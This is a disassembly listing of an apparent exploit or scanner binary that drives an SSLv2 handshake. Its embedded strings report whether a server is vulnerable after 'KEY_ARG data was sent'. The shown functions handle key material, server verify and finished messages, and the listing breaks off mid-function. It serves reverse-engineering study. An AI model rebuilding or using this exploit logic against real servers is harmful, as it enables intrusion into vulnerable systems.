0804ae09 <send_client_master_key+0x19d> pushl  0x10(%ebp)
0804ae0c <send_client_master_key+0x1a0> pushl  0xc(%ebp)
0804ae0f <send_client_master_key+0x1a3> pushl  0xffffffd8(%ebp)
0804ae12 <send_client_master_key+0x1a6> call   08048d9c <_init+0x208>
0804ae17 <send_client_master_key+0x1ab> add    $0x10,%esp
0804ae1a <send_client_master_key+0x1ae> mov    0x10(%ebp),%eax
0804ae1d <send_client_master_key+0x1b1> add    $0x8,%eax
0804ae20 <send_client_master_key+0x1b4> mov    %eax,0xffffffe0(%ebp)
0804ae23 <send_client_master_key+0x1b7> jmp    0804ae4b <send_client_master_key+0x1df>
0804ae25 <send_client_master_key+0x1b9> lea    0x0(%esi),%esi

Referenced from jump at 0804ae04 ; 

0804ae28 <send_client_master_key+0x1bc> call   08048e9c <_init+0x308>
0804ae2d <send_client_master_key+0x1c1> mov    %eax,%eax
0804ae2f <send_client_master_key+0x1c3> mov    0xffffffd8(%ebp),%edx
0804ae32 <send_client_master_key+0x1c6> sar    $0x18,%eax
0804ae35 <send_client_master_key+0x1c9> mov    %al,(%edx)
0804ae37 <send_client_master_key+0x1cb> lea    0xffffffd8(%ebp),%eax
0804ae3a <send_client_master_key+0x1ce> incl   (%eax)
0804ae3c <send_client_master_key+0x1d0> lea    0xffffffd4(%ebp),%eax
0804ae3f <send_client_master_key+0x1d3> incl   (%eax)
0804ae41 <send_client_master_key+0x1d5> jmp    0804ae00 <send_client_master_key+0x194>
0804ae43 <send_client_master_key+0x1d7> nop    

Referenced from jump at 0804adf4 ; 

0804ae44 <send_client_master_key+0x1d8> movl   $0x0,0xffffffe0(%ebp)

Referenced from jump at 0804ae23 ; 

0804ae4b <send_client_master_key+0x1df> lea    0xffffbfc8(%ebp),%eax
0804ae51 <send_client_master_key+0x1e5> add    $0x6,%eax
0804ae54 <send_client_master_key+0x1e8> mov    %eax,0xffffffd8(%ebp)
0804ae57 <send_client_master_key+0x1eb> mov    0xffffffd8(%ebp),%edx
0804ae5a <send_client_master_key+0x1ee> mov    0xffffffe4(%ebp),%eax
0804ae5d <send_client_master_key+0x1f1> sar    $0x8,%eax
0804ae60 <send_client_master_key+0x1f4> and    $0xffffffff,%eax
0804ae63 <send_client_master_key+0x1f7> mov    %al,(%edx)
0804ae65 <send_client_master_key+0x1f9> mov    0xffffffd8(%ebp),%edx
0804ae68 <send_client_master_key+0x1fc> inc    %edx
0804ae69 <send_client_master_key+0x1fd> mov    0xffffffe4(%ebp),%al
0804ae6c <send_client_master_key+0x200> and    $0xffffffff,%eax
0804ae6f <send_client_master_key+0x203> mov    %al,(%edx)
0804ae71 <send_client_master_key+0x205> lea    0xffffffd8(%ebp),%eax
0804ae74 <send_client_master_key+0x208> addl   $0x2,(%eax)
0804ae77 <send_client_master_key+0x20b> mov    0xffffffd8(%ebp),%edx
0804ae7a <send_client_master_key+0x20e> mov    0xffffffe0(%ebp),%eax
0804ae7d <send_client_master_key+0x211> sar    $0x8,%eax
0804ae80 <send_client_master_key+0x214> and    $0xffffffff,%eax
0804ae83 <send_client_master_key+0x217> mov    %al,(%edx)
0804ae85 <send_client_master_key+0x219> mov    0xffffffd8(%ebp),%edx
0804ae88 <send_client_master_key+0x21c> inc    %edx
0804ae89 <send_client_master_key+0x21d> mov    0xffffffe0(%ebp),%al
0804ae8c <send_client_master_key+0x220> and    $0xffffffff,%eax
0804ae8f <send_client_master_key+0x223> mov    %al,(%edx)
0804ae91 <send_client_master_key+0x225> lea    0xffffffd8(%ebp),%eax
0804ae94 <send_client_master_key+0x228> addl   $0x2,(%eax)
0804ae97 <send_client_master_key+0x22b> mov    0xffffffe0(%ebp),%eax
0804ae9a <send_client_master_key+0x22e> add    0xffffffe4(%ebp),%eax
0804ae9d <send_client_master_key+0x231> add    $0xa,%eax
0804aea0 <send_client_master_key+0x234> mov    %eax,0xffffffdc(%ebp)
0804aea3 <send_client_master_key+0x237> sub    $0x4,%esp
0804aea6 <send_client_master_key+0x23a> pushl  0xffffffdc(%ebp)
0804aea9 <send_client_master_key+0x23d> lea    0xffffbfc8(%ebp),%eax
0804aeaf <send_client_master_key+0x243> push   %eax
0804aeb0 <send_client_master_key+0x244> pushl  0x8(%ebp)
0804aeb3 <send_client_master_key+0x247> call   0804a540 <send_ssl_packet>
0804aeb8 <send_client_master_key+0x24c> add    $0x10,%esp
0804aebb <send_client_master_key+0x24f> mov    0x8(%ebp),%eax
0804aebe <send_client_master_key+0x252> movl   $0x1,0x74(%eax)
0804aec5 <send_client_master_key+0x259> mov    $0x1,%eax

Referenced from jump at 0804acb0 ; 0804ad52 ; 0804ad86 ; 0804ade3 ; 

0804aeca <send_client_master_key+0x25e> lea    0xfffffff4(%ebp),%esp
0804aecd <send_client_master_key+0x261> pop    %ebx
0804aece <send_client_master_key+0x262> pop    %esi
0804aecf <send_client_master_key+0x263> pop    %edi
0804aed0 <send_client_master_key+0x264> pop    %ebp
0804aed1 <send_client_master_key+0x265> ret    
0804aed2 <send_client_master_key+0x266> mov    %esi,%esi

---- Function : generate_key_material ----

Referenced from call at 0804afcf ; 

0804aed4 <generate_key_material> push   %ebp
0804aed5 <generate_key_material+0x1> mov    %esp,%ebp
0804aed7 <generate_key_material+0x3> sub    $0x88,%esp
0804aedd <generate_key_material+0x9> movb   $0x30,0xffffff83(%ebp)
0804aee1 <generate_key_material+0xd> mov    0x8(%ebp),%eax
0804aee4 <generate_key_material+0x10> add    $0x24,%eax
0804aee7 <generate_key_material+0x13> mov    %eax,0xffffff84(%ebp)
0804aeea <generate_key_material+0x16> movl   $0x0,0xfffffff4(%ebp)
0804aef1 <generate_key_material+0x1d> lea    0x0(%esi),%esi

Referenced from jump at 0804af93 ; 

0804aef4 <generate_key_material+0x20> cmpl   $0x1f,0xfffffff4(%ebp)
0804aef8 <generate_key_material+0x24> jbe    0804af00 <generate_key_material+0x2c>
0804aefa <generate_key_material+0x26> jmp    0804af98 <generate_key_material+0xc4>
0804aeff <generate_key_material+0x2b> nop    

Referenced from jump at 0804aef8 ; 

0804af00 <generate_key_material+0x2c> sub    $0xc,%esp
0804af03 <generate_key_material+0x2f> lea    0xffffff88(%ebp),%eax
0804af06 <generate_key_material+0x32> push   %eax
0804af07 <generate_key_material+0x33> call   08048cec <_init+0x158>
0804af0c <generate_key_material+0x38> add    $0x10,%esp
0804af0f <generate_key_material+0x3b> sub    $0x4,%esp
0804af12 <generate_key_material+0x3e> push   $0x10
0804af14 <generate_key_material+0x40> mov    0x8(%ebp),%eax
0804af17 <generate_key_material+0x43> add    $0x14,%eax
0804af1a <generate_key_material+0x46> push   %eax
0804af1b <generate_key_material+0x47> lea    0xffffff88(%ebp),%eax
0804af1e <generate_key_material+0x4a> push   %eax
0804af1f <generate_key_material+0x4b> call   08048eac <_init+0x318>
0804af24 <generate_key_material+0x50> add    $0x10,%esp
0804af27 <generate_key_material+0x53> sub    $0x4,%esp
0804af2a <generate_key_material+0x56> push   $0x1
0804af2c <generate_key_material+0x58> lea    0xffffff83(%ebp),%eax
0804af2f <generate_key_material+0x5b> push   %eax
0804af30 <generate_key_material+0x5c> lea    0xffffff88(%ebp),%eax
0804af33 <generate_key_material+0x5f> push   %eax
0804af34 <generate_key_material+0x60> call   08048eac <_init+0x318>
0804af39 <generate_key_material+0x65> add    $0x10,%esp
0804af3c <generate_key_material+0x68> lea    0xffffff83(%ebp),%eax
0804af3f <generate_key_material+0x6b> incb   (%eax)
0804af41 <generate_key_material+0x6d> sub    $0x4,%esp
0804af44 <generate_key_material+0x70> push   $0x10
0804af46 <generate_key_material+0x72> mov    0x8(%ebp),%eax
0804af49 <generate_key_material+0x75> add    $0x4,%eax
0804af4c <generate_key_material+0x78> push   %eax
0804af4d <generate_key_material+0x79> lea    0xffffff88(%ebp),%eax
0804af50 <generate_key_material+0x7c> push   %eax
0804af51 <generate_key_material+0x7d> call   08048eac <_init+0x318>
0804af56 <generate_key_material+0x82> add    $0x10,%esp
0804af59 <generate_key_material+0x85> sub    $0x4,%esp
0804af5c <generate_key_material+0x88> mov    0x8(%ebp),%eax
0804af5f <generate_key_material+0x8b> pushl  0x44(%eax)
0804af62 <generate_key_material+0x8e> mov    0x8(%ebp),%eax
0804af65 <generate_key_material+0x91> add    $0x48,%eax
0804af68 <generate_key_material+0x94> push   %eax
0804af69 <generate_key_material+0x95> lea    0xffffff88(%ebp),%eax
0804af6c <generate_key_material+0x98> push   %eax
0804af6d <generate_key_material+0x99> call   08048eac <_init+0x318>
0804af72 <generate_key_material+0x9e> add    $0x10,%esp
0804af75 <generate_key_material+0xa1> sub    $0x8,%esp
0804af78 <generate_key_material+0xa4> lea    0xffffff88(%ebp),%eax
0804af7b <generate_key_material+0xa7> push   %eax
0804af7c <generate_key_material+0xa8> pushl  0xffffff84(%ebp)
0804af7f <generate_key_material+0xab> call   08048d4c <_init+0x1b8>
0804af84 <generate_key_material+0xb0> add    $0x10,%esp
0804af87 <generate_key_material+0xb3> lea    0xffffff84(%ebp),%eax
0804af8a <generate_key_material+0xb6> addl   $0x10,(%eax)
0804af8d <generate_key_material+0xb9> lea    0xfffffff4(%ebp),%eax
0804af90 <generate_key_material+0xbc> addl   $0x10,(%eax)
0804af93 <generate_key_material+0xbf> jmp    0804aef4 <generate_key_material+0x20>

Referenced from jump at 0804aefa ; 

0804af98 <generate_key_material+0xc4> leave  
0804af99 <generate_key_material+0xc5> ret    
0804af9a <generate_key_material+0xc6> mov    %esi,%esi

---- Function : generate_session_keys ----

Referenced from call at 08049351 ; 080494be ; 

0804af9c <generate_session_keys> push   %ebp
0804af9d <generate_session_keys+0x1> mov    %esp,%ebp
0804af9f <generate_session_keys+0x3> sub    $0x8,%esp
0804afa2 <generate_session_keys+0x6> mov    0x8(%ebp),%eax
0804afa5 <generate_session_keys+0x9> cmpl   $0x0,0x7c(%eax)
0804afa9 <generate_session_keys+0xd> je     0804afb0 <generate_session_keys+0x14>
0804afab <generate_session_keys+0xf> jmp    0804b055 <generate_session_keys+0xb9>

Referenced from jump at 0804afa9 ; 

0804afb0 <generate_session_keys+0x14> mov    0x8(%ebp),%eax
0804afb3 <generate_session_keys+0x17> cmpl   $0x0,0x78(%eax)
0804afb7 <generate_session_keys+0x1b> je     0804afc9 <generate_session_keys+0x2d>
0804afb9 <generate_session_keys+0x1d> sub    $0xc,%esp

Possible reference to string:
" -> generate_session_keys"

0804afbc <generate_session_keys+0x20> push   $0x804caef
0804afc1 <generate_session_keys+0x25> call   08048d8c <_init+0x1f8>
0804afc6 <generate_session_keys+0x2a> add    $0x10,%esp

Referenced from jump at 0804afb7 ; 

0804afc9 <generate_session_keys+0x2d> sub    $0xc,%esp
0804afcc <generate_session_keys+0x30> pushl  0x8(%ebp)
0804afcf <generate_session_keys+0x33> call   0804aed4 <generate_key_material>
0804afd4 <generate_session_keys+0x38> add    $0x10,%esp
0804afd7 <generate_session_keys+0x3b> mov    0x8(%ebp),%edx
0804afda <generate_session_keys+0x3e> mov    0x8(%ebp),%eax
0804afdd <generate_session_keys+0x41> add    $0x24,%eax
0804afe0 <generate_session_keys+0x44> mov    %eax,0x5c(%edx)
0804afe3 <generate_session_keys+0x47> sub    $0xc,%esp
0804afe6 <generate_session_keys+0x4a> push   $0x408
0804afeb <generate_session_keys+0x4f> call   08048c8c <_init+0xf8>
0804aff0 <generate_session_keys+0x54> add    $0x10,%esp
0804aff3 <generate_session_keys+0x57> mov    %eax,%eax
0804aff5 <generate_session_keys+0x59> mov    %eax,%edx
0804aff7 <generate_session_keys+0x5b> mov    0x8(%ebp),%eax
0804affa <generate_session_keys+0x5e> mov    %edx,0x64(%eax)
0804affd <generate_session_keys+0x61> sub    $0x4,%esp
0804b000 <generate_session_keys+0x64> mov    0x8(%ebp),%eax
0804b003 <generate_session_keys+0x67> pushl  0x5c(%eax)
0804b006 <generate_session_keys+0x6a> push   $0x10
0804b008 <generate_session_keys+0x6c> mov    0x8(%ebp),%eax
0804b00b <generate_session_keys+0x6f> pushl  0x64(%eax)
0804b00e <generate_session_keys+0x72> call   08048c4c <_init+0xb8>
0804b013 <generate_session_keys+0x77> add    $0x10,%esp
0804b016 <generate_session_keys+0x7a> mov    0x8(%ebp),%edx
0804b019 <generate_session_keys+0x7d> mov    0x8(%ebp),%eax
0804b01c <generate_session_keys+0x80> add    $0x34,%eax
0804b01f <generate_session_keys+0x83> mov    %eax,0x60(%edx)
0804b022 <generate_session_keys+0x86> sub    $0xc,%esp
0804b025 <generate_session_keys+0x89> push   $0x408
0804b02a <generate_session_keys+0x8e> call   08048c8c <_init+0xf8>
0804b02f <generate_session_keys+0x93> add    $0x10,%esp
0804b032 <generate_session_keys+0x96> mov    %eax,%eax
0804b034 <generate_session_keys+0x98> mov    %eax,%edx
0804b036 <generate_session_keys+0x9a> mov    0x8(%ebp),%eax
0804b039 <generate_session_keys+0x9d> mov    %edx,0x68(%eax)
0804b03c <generate_session_keys+0xa0> sub    $0x4,%esp
0804b03f <generate_session_keys+0xa3> mov    0x8(%ebp),%eax
0804b042 <generate_session_keys+0xa6> pushl  0x60(%eax)
0804b045 <generate_session_keys+0xa9> push   $0x10
0804b047 <generate_session_keys+0xab> mov    0x8(%ebp),%eax
0804b04a <generate_session_keys+0xae> pushl  0x68(%eax)
0804b04d <generate_session_keys+0xb1> call   08048c4c <_init+0xb8>
0804b052 <generate_session_keys+0xb6> add    $0x10,%esp

Referenced from jump at 0804afab ; 

0804b055 <generate_session_keys+0xb9> leave  
0804b056 <generate_session_keys+0xba> ret    
0804b057 <generate_session_keys+0xbb> nop    

---- Function : get_server_verify ----

Referenced from call at 0804935f ; 080494cc ; 

0804b058 <get_server_verify> push   %ebp
0804b059 <get_server_verify+0x1> mov    %esp,%ebp
0804b05b <get_server_verify+0x3> sub    $0x4018,%esp
0804b061 <get_server_verify+0x9> mov    0x8(%ebp),%eax
0804b064 <get_server_verify+0xc> cmpl   $0x0,0x7c(%eax)
0804b068 <get_server_verify+0x10> je     0804b074 <get_server_verify+0x1c>
0804b06a <get_server_verify+0x12> mov    $0x0,%eax
0804b06f <get_server_verify+0x17> jmp    0804b1c9 <get_server_verify+0x171>

Referenced from jump at 0804b068 ; 

0804b074 <get_server_verify+0x1c> mov    0x8(%ebp),%eax
0804b077 <get_server_verify+0x1f> cmpl   $0x0,0x78(%eax)
0804b07b <get_server_verify+0x23> je     0804b08d <get_server_verify+0x35>
0804b07d <get_server_verify+0x25> sub    $0xc,%esp

Possible reference to string:
" -> get_server_verify"

0804b080 <get_server_verify+0x28> push   $0x804cb0a
0804b085 <get_server_verify+0x2d> call   08048d8c <_init+0x1f8>
0804b08a <get_server_verify+0x32> add    $0x10,%esp

Referenced from jump at 0804b07b ; 

0804b08d <get_server_verify+0x35> sub    $0x4,%esp
0804b090 <get_server_verify+0x38> push   $0x4000
0804b095 <get_server_verify+0x3d> lea    0xffffbff8(%ebp),%eax
0804b09b <get_server_verify+0x43> push   %eax
0804b09c <get_server_verify+0x44> pushl  0x8(%ebp)
0804b09f <get_server_verify+0x47> call   0804a2bc <read_ssl_packet>
0804b0a4 <get_server_verify+0x4c> add    $0x10,%esp
0804b0a7 <get_server_verify+0x4f> mov    %eax,%eax
0804b0a9 <get_server_verify+0x51> mov    %eax,0xffffbff4(%ebp)
0804b0af <get_server_verify+0x57> cmpl   $0x0,0xffffbff4(%ebp)
0804b0b6 <get_server_verify+0x5e> jne    0804b108 <get_server_verify+0xb0>
0804b0b8 <get_server_verify+0x60> mov    0x8(%ebp),%eax
0804b0bb <get_server_verify+0x63> cmpl   $0x1,0x7c(%eax)
0804b0bf <get_server_verify+0x67> jne    0804b0dc <get_server_verify+0x84>
0804b0c1 <get_server_verify+0x69> sub    $0x8,%esp

Possible reference to string:
"Connection closed after KEY_ARG data was sent. Server is most likely not vulnerable."

0804b0c4 <get_server_verify+0x6c> push   $0x804cb40
0804b0c9 <get_server_verify+0x71> mov    0x8(%ebp),%eax
0804b0cc <get_server_verify+0x74> sub    $0xffffff80,%eax
0804b0cf <get_server_verify+0x77> push   %eax
0804b0d0 <get_server_verify+0x78> call   08048e6c <_init+0x2d8>
0804b0d5 <get_server_verify+0x7d> add    $0x10,%esp
0804b0d8 <get_server_verify+0x80> jmp    0804b0fc <get_server_verify+0xa4>
0804b0da <get_server_verify+0x82> mov    %esi,%esi

Referenced from jump at 0804b0bf ; 

0804b0dc <get_server_verify+0x84> mov    0x8(%ebp),%eax
0804b0df <get_server_verify+0x87> cmpl   $0x3,0x7c(%eax)
0804b0e3 <get_server_verify+0x8b> jne    0804b0fc <get_server_verify+0xa4>
0804b0e5 <get_server_verify+0x8d> sub    $0x8,%esp

Possible reference to string:
" after KEY_ARG data was sent. Server is not vulnerable."

0804b0e8 <get_server_verify+0x90> push   $0x804cba0
0804b0ed <get_server_verify+0x95> mov    0x8(%ebp),%eax
0804b0f0 <get_server_verify+0x98> sub    $0xffffff80,%eax
0804b0f3 <get_server_verify+0x9b> push   %eax
0804b0f4 <get_server_verify+0x9c> call   08048d7c <_init+0x1e8>
0804b0f9 <get_server_verify+0xa1> add    $0x10,%esp

Referenced from jump at 0804b0d8 ; 0804b0e3 ; 

0804b0fc <get_server_verify+0xa4> mov    $0x0,%eax
0804b101 <get_server_verify+0xa9> jmp    0804b1c9 <get_server_verify+0x171>
0804b106 <get_server_verify+0xae> mov    %esi,%esi

Referenced from jump at 0804b0b6 ; 

0804b108 <get_server_verify+0xb0> cmpl   $0x11,0xffffbff4(%ebp)
0804b10f <get_server_verify+0xb7> je     0804b13c <get_server_verify+0xe4>
0804b111 <get_server_verify+0xb9> mov    0x8(%ebp),%eax
0804b114 <get_server_verify+0xbc> movl   $0x2,0x7c(%eax)
0804b11b <get_server_verify+0xc3> sub    $0x8,%esp

Possible reference to string:
"get_server_verify: Malformed packet size"

0804b11e <get_server_verify+0xc6> push   $0x804cbe0
0804b123 <get_server_verify+0xcb> mov    0x8(%ebp),%eax
0804b126 <get_server_verify+0xce> sub    $0xffffff80,%eax
0804b129 <get_server_verify+0xd1> push   %eax
0804b12a <get_server_verify+0xd2> call   08048e6c <_init+0x2d8>
0804b12f <get_server_verify+0xd7> add    $0x10,%esp
0804b132 <get_server_verify+0xda> mov    $0x0,%eax
0804b137 <get_server_verify+0xdf> jmp    0804b1c9 <get_server_verify+0x171>

Referenced from jump at 0804b10f ; 

0804b13c <get_server_verify+0xe4> cmpb   $0x5,0xffffbff8(%ebp)
0804b143 <get_server_verify+0xeb> je     0804b178 <get_server_verify+0x120>
0804b145 <get_server_verify+0xed> mov    0x8(%ebp),%eax
0804b148 <get_server_verify+0xf0> movl   $0x2,0x7c(%eax)
0804b14f <get_server_verify+0xf7> sub    $0x4,%esp
0804b152 <get_server_verify+0xfa> movzbl 0xffffbff8(%ebp),%eax
0804b159 <get_server_verify+0x101> push   %eax

Possible reference to string:
"get_server_verify: Expected SSL2_MT_SERVER_VERIFY, got 0x%02x"

0804b15a <get_server_verify+0x102> push   $0x804cc20
0804b15f <get_server_verify+0x107> mov    0x8(%ebp),%eax
0804b162 <get_server_verify+0x10a> sub    $0xffffff80,%eax
0804b165 <get_server_verify+0x10d> push   %eax
0804b166 <get_server_verify+0x10e> call   08048e6c <_init+0x2d8>
0804b16b <get_server_verify+0x113> add    $0x10,%esp
0804b16e <get_server_verify+0x116> mov    $0x0,%eax
0804b173 <get_server_verify+0x11b> jmp    0804b1c9 <get_server_verify+0x171>
0804b175 <get_server_verify+0x11d> lea    0x0(%esi),%esi

Referenced from jump at 0804b143 ; 

0804b178 <get_server_verify+0x120> lea    0xffffbff8(%ebp),%eax
0804b17e <get_server_verify+0x126> inc    %eax
0804b17f <get_server_verify+0x127> mov    0x8(%ebp),%edx
0804b182 <get_server_verify+0x12a> add    $0x4,%edx
0804b185 <get_server_verify+0x12d> sub    $0x4,%esp
0804b188 <get_server_verify+0x130> push   $0x10
0804b18a <get_server_verify+0x132> push   %eax
0804b18b <get_server_verify+0x133> push   %edx
0804b18c <get_server_verify+0x134> call   08048d5c <_init+0x1c8>
0804b191 <get_server_verify+0x139> add    $0x10,%esp
0804b194 <get_server_verify+0x13c> mov    %eax,%eax
0804b196 <get_server_verify+0x13e> mov    %eax,%eax
0804b198 <get_server_verify+0x140> test   %eax,%eax
0804b19a <get_server_verify+0x142> je     0804b1c4 <get_server_verify+0x16c>
0804b19c <get_server_verify+0x144> mov    0x8(%ebp),%eax
0804b19f <get_server_verify+0x147> movl   $0x2,0x7c(%eax)
0804b1a6 <get_server_verify+0x14e> sub    $0x8,%esp

Possible reference to string:
"get_server_verify: Challenge strings don't match"

0804b1a9 <get_server_verify+0x151> push   $0x804cc60
0804b1ae <get_server_verify+0x156> mov    0x8(%ebp),%eax
0804b1b1 <get_server_verify+0x159> sub    $0xffffff80,%eax
0804b1b4 <get_server_verify+0x15c> push   %eax
0804b1b5 <get_server_verify+0x15d> call   08048e6c <_init+0x2d8>
0804b1ba <get_server_verify+0x162> add    $0x10,%esp
0804b1bd <get_server_verify+0x165> mov    $0x0,%eax
0804b1c2 <get_server_verify+0x16a> jmp    0804b1c9 <get_server_verify+0x171>

Referenced from jump at 0804b19a ; 

0804b1c4 <get_server_verify+0x16c> mov    $0x1,%eax

Referenced from jump at 0804b06f ; 0804b101 ; 0804b137 ; 0804b173 ; 0804b1c2 ; 

0804b1c9 <get_server_verify+0x171> leave  
0804b1ca <get_server_verify+0x172> ret    
0804b1cb <get_server_verify+0x173> nop    

---- Function : send_client_finished ----

Referenced from call at 0804936d ; 08049522 ; 

0804b1cc <send_client_finished> push   %ebp
0804b1cd <send_client_finished+0x1> mov    %esp,%ebp
0804b1cf <send_client_finished+0x3> sub    $0x4008,%esp
0804b1d5 <send_client_finished+0x9> mov    0x8(%ebp),%eax
0804b1d8 <send_client_finished+0xc> cmpl   $0x0,0x7c(%eax)
0804b1dc <send_client_finished+0x10> je     0804b1e8 <send_client_finished+0x1c>
0804b1de <send_client_finished+0x12> mov    $0x0,%eax
0804b1e3 <send_client_finished+0x17> jmp    0804b24a <send_client_finished+0x7e>
0804b1e5 <send_client_finished+0x19> lea    0x0(%esi),%esi

Referenced from jump at 0804b1dc ; 

0804b1e8 <send_client_finished+0x1c> mov    0x8(%ebp),%eax
0804b1eb <send_client_finished+0x1f> cmpl   $0x0,0x78(%eax)
0804b1ef <send_client_finished+0x23> je     0804b201 <send_client_finished+0x35>
0804b1f1 <send_client_finished+0x25> sub    $0xc,%esp

Possible reference to string:
" -> send_client_finished"

0804b1f4 <send_client_finished+0x28> push   $0x804cc91
0804b1f9 <send_client_finished+0x2d> call   08048d8c <_init+0x1f8>
0804b1fe <send_client_finished+0x32> add    $0x10,%esp

Referenced from jump at 0804b1ef ; 

0804b201 <send_client_finished+0x35> movb   $0x3,0xffffbff8(%ebp)
0804b208 <send_client_finished+0x3c> sub    $0x4,%esp
0804b20b <send_client_finished+0x3f> mov    0x8(%ebp),%eax
0804b20e <send_client_finished+0x42> pushl  0x44(%eax)
0804b211 <send_client_finished+0x45> mov    0x8(%ebp),%eax
0804b214 <send_client_finished+0x48> add    $0x48,%eax
0804b217 <send_client_finished+0x4b> push   %eax
0804b218 <send_client_finished+0x4c> lea    0xffffbff8(%ebp),%eax
0804b21e <send_client_finished+0x52> inc    %eax
0804b21f <send_client_finished+0x53> push   %eax
0804b220 <send_client_finished+0x54> call   08048d9c <_init+0x208>
0804b225 <send_client_finished+0x59> add    $0x10,%esp
0804b228 <send_client_finished+0x5c> sub    $0x4,%esp
0804b22b <send_client_finished+0x5f> mov    0x8(%ebp),%eax
0804b22e <send_client_finished+0x62> mov    0x44(%eax),%eax
0804b231 <send_client_finished+0x65> inc    %eax
0804b232 <send_client_finished+0x66> push   %eax
0804b233 <send_client_finished+0x67> lea    0xffffbff8(%ebp),%eax
0804b239 <send_client_finished+0x6d> push   %eax
0804b23a <send_client_finished+0x6e> pushl  0x8(%ebp)
0804b23d <send_client_finished+0x71> call   0804a540 <send_ssl_packet>
0804b242 <send_client_finished+0x76> add    $0x10,%esp
0804b245 <send_client_finished+0x79> mov    $0x1,%eax

Referenced from jump at 0804b1e3 ; 

0804b24a <send_client_finished+0x7e> leave  
0804b24b <send_client_finished+0x7f> ret    

---- Function : get_server_finished ----

Referenced from call at 08049387 ; 

0804b24c <get_server_finished> push   %ebp
0804b24d <get_server_finished+0x1> mov    %esp,%ebp
0804b24f <get_server_finished+0x3> sub    $0x4018,%esp
0804b255 <get_server_finished+0x9> mov    0x8(%ebp),%eax
0804b258 <get_server_finished+0xc> cmpl   $0x0,0x7c(%eax)
0804b25c <get_server_finished+0x10> je     0804b268 <get_server_finished+0x1c>
0804b25e <get_server_finished+0x12> mov    $0x0,%eax
0804b263 <get_server_finished+0x17> jmp    0804b3df <get_server_finished+0x193>

Referenced from jump at 0804b25c ; 

0804b268 <get_server_finished+0x1c> mov    0x8(%ebp),%eax
0804b26b <get_server_finished+0x1f> cmpl   $0x0,0x78(%eax)
0804b26f <get_server_finished+0x23> je     0804b281 <get_server_finished+0x35>
0804b271 <get_server_finished+0x25> sub    $0xc,%esp

Possible reference to string:
" -> get_server_finished"

0804b274 <get_server_finished+0x28> push   $0x804ccab
0804b279 <get_server_finished+0x2d> call   08048d8c <_init+0x1f8>
0804b27e <get_server_finished+0x32> add    $0x10,%esp

Referenced from jump at 0804b26f ; 

0804b281 <get_server_finished+0x35> sub    $0x4,%esp
0804b284 <get_server_finished+0x38> push   $0x4000
0804b289 <get_server_finished+0x3d> lea    0xffffbff8(%ebp),%eax
0804b28f <get_server_finished+0x43> push   %eax
0804b290 <get_server_finished+0x44> pushl  0x8(%ebp)
0804b293 <get_server_finished+0x47> call   0804a2bc <read_ssl_packet>
0804b298 <get_server_finished+0x4c> add    $0x10,%esp
0804b29b <get_server_finished+0x4f> mov    %eax,%eax
0804b29d <get_server_finished+0x51> mov    %eax,0xffffbff4(%ebp)
0804b2a3 <get_server_finished+0x57> cmpl   $0x0,0xffffbff4(%ebp)
0804b2aa <get_server_finished+0x5e> jne    0804b2fc <get_server_finished+0xb0>
0804b2ac <get_server_finished+0x60> mov    0x8(%ebp),%eax
0804b2af <get_server_finished+0x63> cmpl   $0x1,0x7c(%eax)
0804b2b3 <get_server_finished+0x67> jne    0804b2d0 <get_server_finished+0x84>
0804b2b5 <get_server_finished+0x69> sub    $0x8,%esp

Possible reference to string:
"Connection closed while waiting for the SERVER_FINISHED message. This was not supposed to happen."

0804b2b8 <get_server_finished+0x6c> push   $0x804cce0
0804b2bd <get_server_finished+0x71> mov    0x8(%ebp),%eax
0804b2c0 <get_server_finished+0x74> sub    $0xffffff80,%eax
0804b2c3 <get_server_finished+0x77> push   %eax
0804b2c4 <get_server_finished+0x78> call   08048e6c <_init+0x2d8>
0804b2c9 <get_server_finished+0x7d> add    $0x10,%esp
0804b2cc <get_server_finished+0x80> jmp    0804b2f0 <get_server_finished+0xa4>
0804b2ce <get_server_finished+0x82> mov    %esi,%esi

Referenced from jump at 0804b2b3 ; 

0804b2d0 <get_server_finished+0x84> mov    0x8(%ebp),%eax
0804b2d3 <get_server_finished+0x87> cmpl   $0x3,0x7c(%eax)
0804b2d7 <get_server_finished+0x8b> jne    0804b2f0 <get_server_finished+0xa4>
0804b2d9 <get_server_finished+0x8d> sub    $0x8,%esp

Possible reference to string:
" while waiting for the SERVER_FINISHED message. This was not supposed to happen."

0804b2dc <get_server_finished+0x90> push   $0x804cd60
0804b2e1 <get_server_finished+0x95> mov    0x8(%ebp),%eax
0804b2e4 <get_server_finished+0x98> sub    $0xffffff80,%eax
0804b2e7 <get_server_finished+0x9b> push   %eax
0804b2e8 <get_server_finished+0x9c> call   08048d7c <_init+0x1e8>
0804b2ed <get_server_finished+0xa1> add    $0x10,%esp

Referenced from jump at 0804b2cc ; 0804b2d7 ; 

0804b2f0 <get_server_finished+0xa4> mov    $0x0,%eax
0804b2f5 <get_server_finished+0xa9> jmp    0804b3df <get_server_finished+0x193>
0804b2fa <get_server_finished+0xae> mov    %esi,%esi

Referenced from jump at 0804b2aa ; 

0804b2fc <get_server_finished+0xb0> cmpb   $0x6,0xffffbff8(%ebp)
0804b303 <get_server_finished+0xb7> je     0804b338 <get_server_finished+0xec>
0804b305 <get_server_finished+0xb9> mov    0x8(%ebp),%eax
0804b308 <get_server_finished+0xbc> movl   $0x2,0x7c(%eax)
0804b30f <get_server_finished+0xc3> sub    $0x4,%esp
0804b312 <get_server_finished+0xc6> movzbl 0xffffbff8(%ebp),%eax
0804b319 <get_server_finished+0xcd> push   %eax

Possible reference to string:
"get_server_finished: Expected SSL2_MT_SERVER_FINISHED, got %02x"

0804b31a <get_server_finished+0xce> push   $0x804cdc0
0804b31f <get_server_finished+0xd3> mov    0x8(%ebp),%eax
0804b322 <get_server_finished+0xd6> sub    $0xffffff80,%eax
0804b325 <get_server_finished+0xd9> push   %eax
0804b326 <get_server_finished+0xda> call   08048e6c <_init+0x2d8>
0804b32b <get_server_finished+0xdf> add    $0x10,%esp
0804b32e <get_server_finished+0xe2> mov    $0x0,%eax
0804b333 <get_server_finished+0xe7> jmp    0804b3df <get_server_finished+0x193>

Referenced from jump at 0804b303 ; 

0804b338 <get_server_finished+0xec> cmpl   $0x0,0xc(%ebp)
0804b33c <get_server_finished+0xf0> je     0804b3d6 <get_server_finished+0x18a>
0804b342 <get_server_finished+0xf6> cmpl   $0x1,0xffffbff4(%ebp)
0804b349 <get_server_finished+0xfd> jne    0804b37c <get_server_finished+0x130>
0804b34b <get_server_finished+0xff> mov    0x8(%ebp),%eax
0804b34e <get_server_finished+0x102> movl   $0x2,0x7c(%eax)
0804b355 <get_server_finished+0x109> sub    $0x4,%esp
